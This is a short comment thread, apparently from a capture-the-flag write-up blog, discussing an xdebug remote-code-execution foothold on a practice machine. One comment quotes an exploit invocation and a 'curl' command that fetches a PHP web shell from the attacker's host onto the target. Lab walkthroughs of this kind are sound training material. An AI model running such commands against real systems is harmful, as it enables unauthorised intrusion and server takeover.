Great post. When I was doing the box I never thought to use Nikto and it took me quite a while to notice that first foothold!
Lesson learned, thanks.
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
Thank you very much for your writeups.
May I ask you 2 questions:
I wonder what keywords in Google you used to find this github.com link:
I tried these keywords in Google without success.
xdebug exploit shell
xdebug exploit rce
xdebug exploit repository
xdebug php exploit
Question 2 has 2 sub questions:
You wrote in your writeup:
./xdebug-shell.py -u http://10.10.10.83
curl -O http://miIp/shell.php
Is this "xdebug-shell.py" the code copied from
the IP address of my Kali Linux?
Thanks a million.
I guess the keywords to search on Google were:
php debug rce